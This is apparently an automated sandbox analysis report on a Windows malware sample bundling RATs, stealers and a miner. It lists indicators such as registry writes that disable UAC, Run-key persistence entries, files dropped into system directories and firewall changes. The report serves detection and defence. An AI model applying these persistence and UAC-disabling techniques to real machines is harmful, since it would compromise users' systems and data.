Analysis Overview
SHA256
37d8e1ce3b6e6488942717aa78cb54785edc985143bcc8d9ba9f42d73a3dbd7a
Threat Level: Known bad
The file RIP_YOUR_PC_LOL.exe was found to be: Known bad.
Malicious Activity Summary
AsyncRat
Xmrig family
Purplefox family
HawkEye
DcRat
Asyncrat family
Detect Blackmoon payload
xmrig
Dcrat family
Gh0strat
Hawkeye family
PurpleFox
Nanocore family
Njrat family
UAC bypass
Oski family
Detect PurpleFox Rootkit
Oski
Gh0strat family
Azorult family
Raccoon Stealer V1 payload
njRAT/Bladabindi
Redline family
RedLine
Blackmoon family
Raccoon family
Blackmoon, KrBanker
Fickerstealer family
Raccoon
Process spawned unexpected child process
Fickerstealer
Azorult
Gh0st RAT payload
NanoCore
NirSoft WebBrowserPassView
Async RAT payload
DCRat payload
Identifies VirtualBox via ACPI registry values (likely anti-VM)
NirSoft MailPassView
XMRig Miner payload
Detected Nirsoft tools
Sets service image path in registry
Server Software Component: Terminal Services DLL
Modifies Windows Firewall
Drops file in Drivers directory
Drops startup file
Uses the VBS compiler for execution
Checks BIOS information in registry
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Checks whether UAC is enabled
Looks up external IP address via web service
Indicator Removal: File Deletion
Adds Run key to start application
Suspicious use of SetThreadContext
Drops file in System32 directory
UPX packed file
Drops file in Program Files directory
Drops file in Windows directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
Event Triggered Execution: Netsh Helper DLL
Unsigned PE
Program crash
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Runs ping.exe
Modifies data under HKEY_USERS
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
Scheduled Task/Job: Scheduled Task
Suspicious use of AdjustPrivilegeToken
System policy modification
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-12-07 03:49
Signatures
Blackmoon family
Detect Blackmoon payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nanocore family
Njrat family
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-12-07 03:49
Reported
2024-12-07 03:50
Platform
win7-20241010-en
Max time kernel
24s
Max time network
69s
Command Line
Signatures
AsyncRat
Asyncrat family
Azorult
Azorult family
Blackmoon family
Blackmoon, KrBanker
DcRat
Dcrat family
Detect Blackmoon payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detect PurpleFox Rootkit
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Fickerstealer
Fickerstealer family
Gh0st RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gh0strat
Gh0strat family
HawkEye
Hawkeye family
NanoCore
Nanocore family
Njrat family
Oski
Oski family
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\schtasks.exe |
PurpleFox
Purplefox family
Raccoon
Raccoon Stealer V1 payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Raccoon family
RedLine
Redline family
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Xmrig family
njRAT/Bladabindi
xmrig
Async RAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
DCRat payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detected Nirsoft tools
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\system32\drivers\QAssist.sys | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\netsh.exe | N/A |
Server Software Component: Terminal Services DLL
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Ö÷¶¯·ÀÓù·þÎñÄ£¿é\Parameters\ServiceDll = "C:\\Windows\\system32\\259440504.txt" | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\QAssist\ImagePath = "system32\\DRIVERS\\QAssist.sys" | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a797c6ca3f5e7aff8fa1149c47fe9466.exe | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Uses the VBS compiler for execution
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\DSL Manager = "C:\\Program Files (x86)\\DSL Manager\\dslmgr.exe" | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\aaa = "\"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\es\\aaa.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mediaget = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget\\mediaget.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Windows\CurrentVersion\Run\a797c6ca3f5e7aff8fa1149c47fe9466 = "\"C:\\Users\\Admin\\AppData\\Roaming\\mediaget.exe\" .." | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhost = "\"C:\\Program Files\\Windows Portable Devices\\taskhost.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\explorer = "\"C:\\Windows\\hh\\explorer.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\mediaget = "\"C:\\PerfLogs\\Admin\\mediaget.exe\"" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Indicator Removal: File Deletion
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | whatismyipaddress.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
| N/A | whatismyipaddress.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\ini.ini | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| File created | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | C:\Windows\SysWOW64\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | C:\Windows\SysWOW64\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat | C:\Windows\SysWOW64\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\TXPlatforn.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\TXPlatforn.exe | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| File created | C:\Windows\SysWOW64\259440504.txt | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
Suspicious use of SetThreadContext
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Google\Chrome\Application\chrome.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File opened for modification | C:\Program Files\VideoLAN\VLC\vlc.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File created | C:\Program Files (x86)\DSL Manager\dslmgr.exe | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| File opened for modification | C:\Program Files (x86)\DSL Manager\dslmgr.exe | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| File created | C:\Program Files\Windows Portable Devices\taskhost.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File opened for modification | C:\Program Files\Windows Portable Devices\taskhost.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\f820f26656ae6d1e1cd0ede001693a81e45f4037 | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File opened for modification | C:\Program Files\Mozilla Firefox\firefox.exe | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| File created | C:\Program Files\Windows Portable Devices\b75386f1303e64d8139363b71e44ac16341adf4e | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\es\aaa.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Cursors\WUDFhosts.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\hh\explorer.exe | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Windows\hh\7a0fd90576e08807bde2cc57bcf9854bbce05fe3 | C:\Users\Admin\AppData\Roaming\3.exe | N/A |
| File created | C:\Windows\Cursors\KillProcc.sys | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File opened for modification | C:\Windows\Cursors\TrustedInsteller.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Help\Winlogon.exe | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| File created | C:\Windows\Help\active_desktop_render.dll | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Netsh Helper DLL
| Description | Indicator | Process | Target |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh | C:\Windows\SysWOW64\netsh.exe | N/A |
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\Help\Winlogon.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RIP_YOUR_PC_LOL.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\healastounding.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\aaa.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\___11.19.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\22.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\Ö÷¶¯·ÀÓù·þÎñÄ£¿é.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Help\Winlogon.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\4.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\TXPlatforn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchos.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Opus.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\a.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Dcvxaamev.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\8f1c8b40c7be588389a8d382040b23bb.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\0fd7de5367376231a788872005d7ed4f.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\gay.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\mediaget.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\HD____11.19.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\PING.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\Pluto Panel.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\test.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\FFDvbcrdfqs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\netsh.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\svchost.exe | N/A |
System Network Configuration Discovery: Internet Connection Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" | C:\Windows\SysWOW64\svchost.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\SysWOW64\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad | C:\Windows\SysWOW64\svchost.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
